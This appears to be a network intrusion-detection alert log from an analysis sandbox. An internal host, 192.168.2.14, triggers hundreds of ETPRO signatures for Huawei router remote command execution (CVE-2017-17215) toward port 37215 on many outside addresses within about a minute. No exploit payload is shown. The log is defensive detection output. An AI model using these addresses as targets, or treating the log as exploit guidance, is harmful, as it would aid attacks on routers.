                                                        06/13/24-21:32:15.635190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4211037215192.168.2.1441.196.232.83
                                                        06/13/24-21:32:15.610342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238437215192.168.2.14156.67.183.10
                                                        06/13/24-21:33:02.938004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5702837215192.168.2.14197.177.138.170
                                                        06/13/24-21:32:13.565517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5739637215192.168.2.1441.160.85.66
                                                        06/13/24-21:33:00.870242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085637215192.168.2.14156.250.128.252
                                                        06/13/24-21:32:48.551720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4882637215192.168.2.14156.173.173.44
                                                        06/13/24-21:32:38.322129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5791237215192.168.2.14197.14.175.72
                                                        06/13/24-21:32:40.359747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5499237215192.168.2.14197.105.10.229
                                                        06/13/24-21:32:21.782088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5839437215192.168.2.14156.116.43.59
                                                        06/13/24-21:32:36.247295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3753037215192.168.2.14197.181.30.90
                                                        06/13/24-21:32:42.403819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626637215192.168.2.14197.139.238.54
                                                        06/13/24-21:32:48.551069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4663637215192.168.2.14156.191.154.223
                                                        06/13/24-21:32:56.757830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3929837215192.168.2.14197.209.140.91
                                                        06/13/24-21:33:17.309802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626237215192.168.2.14197.67.103.91
                                                        06/13/24-21:32:58.823602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5837837215192.168.2.1441.218.215.46
                                                        06/13/24-21:31:59.174757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515837215192.168.2.1441.128.20.245
                                                        06/13/24-21:32:17.676792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4924837215192.168.2.1441.211.154.252
                                                        06/13/24-21:33:02.936405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5282237215192.168.2.14197.118.186.101
                                                        06/13/24-21:32:03.275597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4855237215192.168.2.14156.157.250.81
                                                        06/13/24-21:32:52.677993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586837215192.168.2.14197.162.57.244
                                                        06/13/24-21:32:56.757050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4709037215192.168.2.14197.115.70.100
                                                        06/13/24-21:32:23.941159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4580437215192.168.2.14197.15.123.57
                                                        06/13/24-21:32:03.308505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4863637215192.168.2.14156.133.67.92
                                                        06/13/24-21:33:09.101970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5508437215192.168.2.14197.27.180.218
                                                        06/13/24-21:32:30.094126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3807637215192.168.2.14156.206.238.208
                                                        06/13/24-21:32:30.123827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3692637215192.168.2.14197.185.87.9
                                                        06/13/24-21:32:23.943763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520237215192.168.2.1441.148.62.205
                                                        06/13/24-21:32:21.802020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3446437215192.168.2.14156.202.98.105
                                                        06/13/24-21:32:09.457149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565637215192.168.2.1441.172.83.247
                                                        06/13/24-21:32:50.614987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3939637215192.168.2.1441.221.120.14
                                                        06/13/24-21:32:13.546991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621437215192.168.2.14197.88.77.75
                                                        06/13/24-21:32:09.436761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5154837215192.168.2.14197.26.215.132
                                                        06/13/24-21:32:09.456823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3332437215192.168.2.1441.81.232.142
                                                        06/13/24-21:32:17.674976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3614837215192.168.2.14197.87.159.1
                                                        06/13/24-21:32:23.836894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4106637215192.168.2.14156.11.222.219
                                                        06/13/24-21:32:17.695355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813237215192.168.2.14197.168.59.95
                                                        06/13/24-21:32:56.756285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886237215192.168.2.14197.127.9.232
                                                        06/13/24-21:32:05.343644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5155037215192.168.2.1441.43.142.61
                                                        06/13/24-21:32:05.348552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382437215192.168.2.14156.23.174.155
                                                        06/13/24-21:33:09.109991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256437215192.168.2.14156.127.45.140
                                                        06/13/24-21:32:05.369523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755637215192.168.2.1441.46.0.111
                                                        06/13/24-21:32:28.028299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5758837215192.168.2.14156.23.3.206
                                                        06/13/24-21:32:42.421291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3785437215192.168.2.14156.55.235.254
                                                        06/13/24-21:32:23.836144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4318637215192.168.2.14197.133.119.105
                                                        06/13/24-21:32:36.247200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5543637215192.168.2.14156.108.0.18
                                                        06/13/24-21:33:13.213677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3344037215192.168.2.1441.189.103.84
                                                        06/13/24-21:32:01.222950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5511837215192.168.2.1441.136.79.242
                                                        06/13/24-21:32:03.307011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4370837215192.168.2.14197.143.155.0
                                                        06/13/24-21:32:19.749720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4260837215192.168.2.1441.97.240.92
                                                        06/13/24-21:32:42.409196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025237215192.168.2.14156.208.99.245
                                                        06/13/24-21:33:11.154765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4303837215192.168.2.1441.15.57.164
                                                        06/13/24-21:32:56.758644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5717637215192.168.2.14197.132.255.26
                                                        06/13/24-21:33:04.989823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4824637215192.168.2.1441.5.241.191
                                                        06/13/24-21:32:42.405150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013637215192.168.2.14197.21.49.81
                                                        06/13/24-21:32:09.440495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4195037215192.168.2.14197.102.44.176
                                                        06/13/24-21:32:11.508871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3785437215192.168.2.14156.118.201.224
                                                        06/13/24-21:32:48.554195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298237215192.168.2.1441.109.55.44
                                                        06/13/24-21:32:58.843863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440837215192.168.2.14197.193.129.243
                                                        06/13/24-21:32:23.836798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618037215192.168.2.14197.141.78.237
                                                        06/13/24-21:32:03.297525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5689237215192.168.2.14156.245.123.173
                                                        06/13/24-21:33:17.341060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3906237215192.168.2.1441.45.53.10
                                                        06/13/24-21:32:34.213704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5246437215192.168.2.1441.245.242.138
                                                        06/13/24-21:32:09.439456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5276437215192.168.2.14197.217.51.179
                                                        06/13/24-21:32:38.298441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4146037215192.168.2.14197.126.142.227
                                                        06/13/24-21:32:54.711863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4931637215192.168.2.14156.98.12.67
                                                        06/13/24-21:32:38.316042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6032437215192.168.2.1441.229.53.241
                                                        06/13/24-21:32:25.997365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3961037215192.168.2.14156.2.77.10
                                                        06/13/24-21:32:25.974115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3407837215192.168.2.14197.164.35.212
                                                        06/13/24-21:33:13.228672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4761837215192.168.2.14156.45.119.123
                                                        06/13/24-21:32:38.318749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3527437215192.168.2.14156.203.150.54
                                                        06/13/24-21:33:00.872200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3637837215192.168.2.1441.155.135.229
                                                        06/13/24-21:32:54.707615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4725637215192.168.2.14197.138.63.204
                                                        06/13/24-21:33:05.017111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4631237215192.168.2.1441.145.147.236
                                                        06/13/24-21:33:04.992238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492237215192.168.2.14156.165.75.175
                                                        06/13/24-21:33:09.088895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4784637215192.168.2.14197.237.184.169
                                                        06/13/24-21:32:52.658499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4195037215192.168.2.14197.35.158.26
                                                        06/13/24-21:32:58.822422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617637215192.168.2.14156.19.32.44
                                                        06/13/24-21:33:13.229512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503237215192.168.2.1441.21.220.163
                                                        06/13/24-21:31:57.092722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4193637215192.168.2.14156.188.19.114
                                                        06/13/24-21:32:40.358097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5685637215192.168.2.14197.202.249.149
                                                        06/13/24-21:32:05.369171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4656437215192.168.2.14197.50.10.172
                                                        06/13/24-21:32:11.507517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3522237215192.168.2.14156.76.59.149
                                                        06/13/24-21:33:02.952898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5323037215192.168.2.14197.223.230.72
                                                        06/13/24-21:32:50.633348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544637215192.168.2.14156.39.227.203
                                                        06/13/24-21:33:11.180335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5431437215192.168.2.14156.157.51.12
                                                        06/13/24-21:32:25.993953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3470237215192.168.2.14156.64.117.254
                                                        06/13/24-21:33:11.179024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3626237215192.168.2.14156.248.247.56
                                                        06/13/24-21:32:03.276000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5844437215192.168.2.14156.91.16.222
                                                        06/13/24-21:32:34.192958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3806837215192.168.2.14197.89.222.121
                                                        06/13/24-21:32:36.246388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4167637215192.168.2.14156.196.138.253
                                                        06/13/24-21:33:11.154842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4816837215192.168.2.14197.132.248.52
                                                        06/13/24-21:32:52.654042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5342437215192.168.2.1441.35.110.208
                                                        06/13/24-21:33:11.177349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239837215192.168.2.14156.9.12.66
                                                        06/13/24-21:33:17.308477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5337637215192.168.2.14197.192.207.30
                                                        06/13/24-21:32:44.480840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5426237215192.168.2.14156.195.122.86
                                                        06/13/24-21:31:57.155163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4586037215192.168.2.14156.52.146.119
                                                        06/13/24-21:32:32.168696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4896637215192.168.2.14197.219.38.109
                                                        06/13/24-21:32:50.631135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5292437215192.168.2.14156.233.118.141
                                                        06/13/24-21:32:07.417705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433837215192.168.2.14156.193.242.239
                                                        06/13/24-21:32:36.247730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4090037215192.168.2.1441.56.54.149
                                                        06/13/24-21:32:28.046184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5154437215192.168.2.14156.103.55.38
                                                        06/13/24-21:32:11.488500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3941837215192.168.2.14156.134.25.37
                                                        06/13/24-21:33:13.214157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3592637215192.168.2.14197.241.17.170
                                                        06/13/24-21:32:40.357565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398237215192.168.2.14197.46.227.225
                                                        06/13/24-21:32:40.358950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037437215192.168.2.1441.135.119.155
                                                        06/13/24-21:33:00.885281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4108637215192.168.2.14197.124.108.206
                                                        06/13/24-21:32:30.078946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4295437215192.168.2.1441.176.253.114
                                                        06/13/24-21:32:42.422059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324637215192.168.2.1441.55.110.32
                                                        06/13/24-21:32:40.353646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6083637215192.168.2.14156.234.5.218
                                                        06/13/24-21:33:09.088493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5405837215192.168.2.14156.64.178.84
                                                        06/13/24-21:33:15.273921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5926637215192.168.2.14156.188.212.91
                                                        06/13/24-21:32:32.167713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5140637215192.168.2.14197.12.179.9
                                                        06/13/24-21:32:56.754069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3831437215192.168.2.14197.168.242.23
                                                        06/13/24-21:33:15.257623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6075837215192.168.2.14197.237.226.102
                                                        06/13/24-21:32:58.841982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5701637215192.168.2.14197.186.15.20
                                                        06/13/24-21:32:30.079333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4952437215192.168.2.14156.103.250.176
                                                        06/13/24-21:32:58.838981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3372837215192.168.2.14197.251.54.218
                                                        06/13/24-21:33:09.090406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388437215192.168.2.14197.81.248.88
                                                        06/13/24-21:31:57.090387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5503037215192.168.2.1441.170.30.183
                                                        06/13/24-21:32:28.027949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4160237215192.168.2.14197.10.59.145
                                                        06/13/24-21:33:02.936209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3449637215192.168.2.1441.148.103.117
                                                        06/13/24-21:33:11.159516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5235237215192.168.2.1441.107.108.138
                                                        06/13/24-21:31:59.174571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4752837215192.168.2.1441.116.41.50
                                                        06/13/24-21:33:09.108646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5267637215192.168.2.14156.31.183.156
                                                        06/13/24-21:32:23.944167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3857437215192.168.2.14156.248.44.29
                                                        06/13/24-21:33:02.913576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3559637215192.168.2.1441.112.162.182
                                                        06/13/24-21:32:36.248007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5311237215192.168.2.14156.72.177.94
                                                        06/13/24-21:32:46.508109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4330037215192.168.2.1441.239.208.246
                                                        06/13/24-21:31:57.135586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4093637215192.168.2.14197.136.192.34
                                                        06/13/24-21:33:11.175608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5202837215192.168.2.14197.121.17.7
                                                        06/13/24-21:32:15.635830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5953237215192.168.2.1441.254.82.189
                                                        06/13/24-21:32:34.214056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246837215192.168.2.14156.189.191.174
                                                        06/13/24-21:32:40.373687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4182237215192.168.2.14197.95.93.109
                                                        06/13/24-21:32:09.439668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5102437215192.168.2.14156.13.255.82
                                                        06/13/24-21:32:48.568730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965437215192.168.2.14197.214.210.232
                                                        06/13/24-21:32:34.191584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5096437215192.168.2.14156.183.171.237
                                                        06/13/24-21:32:30.076141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5884237215192.168.2.1441.79.23.27
                                                        06/13/24-21:32:30.098343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5062037215192.168.2.14197.48.131.177
                                                        06/13/24-21:32:44.477042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5566437215192.168.2.1441.244.121.158
                                                        06/13/24-21:32:38.298351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727437215192.168.2.1441.199.51.84
                                                        06/13/24-21:32:21.780102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3783637215192.168.2.14156.57.153.243
                                                        06/13/24-21:32:32.152332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4840037215192.168.2.14156.29.237.0
                                                        06/13/24-21:33:17.309520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4168037215192.168.2.1441.201.28.48
                                                        06/13/24-21:33:02.936703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440637215192.168.2.1441.149.40.12
                                                        06/13/24-21:33:07.039641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499037215192.168.2.14156.207.36.100
                                                        06/13/24-21:33:17.308388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3909637215192.168.2.14197.95.184.69
                                                        06/13/24-21:33:17.308257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565637215192.168.2.1441.188.119.90
                                                        06/13/24-21:32:13.547477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5247637215192.168.2.14156.42.44.215
                                                        06/13/24-21:32:30.077024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3960637215192.168.2.14197.99.8.173
                                                        06/13/24-21:33:07.039445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4016237215192.168.2.14197.220.230.208
                                                        06/13/24-21:32:50.631440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854437215192.168.2.14197.82.92.227
                                                        06/13/24-21:32:01.221500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5036637215192.168.2.14156.98.177.189
                                                        06/13/24-21:32:32.170166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4306237215192.168.2.14156.71.196.63
                                                        06/13/24-21:32:17.670478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437637215192.168.2.14156.69.149.252
                                                        06/13/24-21:33:04.991182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5645837215192.168.2.14197.111.217.62
                                                        06/13/24-21:31:57.133487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5281837215192.168.2.14197.41.9.107
                                                        06/13/24-21:32:01.241691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5863237215192.168.2.14156.173.125.201
                                                        06/13/24-21:32:13.546848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4215637215192.168.2.1441.193.201.148
                                                        06/13/24-21:32:19.728970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3773437215192.168.2.14156.16.79.247
                                                        06/13/24-21:32:23.930728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4999437215192.168.2.1441.184.76.191
                                                        06/13/24-21:32:52.677581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443037215192.168.2.1441.20.84.62
                                                        06/13/24-21:32:58.820774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4863837215192.168.2.14197.203.107.191
                                                        06/13/24-21:33:02.952437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131437215192.168.2.14197.127.144.33
                                                        06/13/24-21:33:13.211197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5679237215192.168.2.1441.114.221.235
                                                        06/13/24-21:32:21.804536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3603037215192.168.2.1441.92.219.172
                                                        06/13/24-21:33:17.338635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5997837215192.168.2.1441.72.64.210
                                                        06/13/24-21:32:52.669304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5411037215192.168.2.1441.27.46.43
                                                        06/13/24-21:32:09.456079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302037215192.168.2.14197.110.66.93
                                                        06/13/24-21:32:40.354377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478037215192.168.2.14197.52.46.31
                                                        06/13/24-21:32:56.787853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3815437215192.168.2.14156.254.21.78
                                                        06/13/24-21:33:17.309214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3341637215192.168.2.1441.209.159.193
                                                        06/13/24-21:32:30.124559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5663637215192.168.2.1441.150.155.114
                                                        06/13/24-21:32:46.528245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5230437215192.168.2.14197.43.81.179
                                                        06/13/24-21:33:09.111794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4740837215192.168.2.14197.202.78.215
                                                        06/13/24-21:32:48.552719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3279037215192.168.2.1441.135.185.71
                                                        06/13/24-21:32:54.711454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5311437215192.168.2.14156.17.65.147
                                                        06/13/24-21:33:00.870365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5281437215192.168.2.14197.114.205.6
                                                        06/13/24-21:32:11.486222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3758437215192.168.2.14156.60.182.93
                                                        06/13/24-21:32:30.095646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475237215192.168.2.14156.157.146.45
                                                        06/13/24-21:32:40.354288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332837215192.168.2.14156.175.99.18
                                                        06/13/24-21:31:59.195887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3418837215192.168.2.1441.30.13.4
                                                        06/13/24-21:32:42.418149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4103637215192.168.2.14156.218.129.29
                                                        06/13/24-21:32:30.124075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5681237215192.168.2.1441.155.140.175
                                                        06/13/24-21:33:09.128457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3392837215192.168.2.14197.60.230.149
                                                        06/13/24-21:32:38.322862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5714837215192.168.2.14156.178.10.138
                                                        06/13/24-21:32:54.707281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4776437215192.168.2.14156.71.70.204
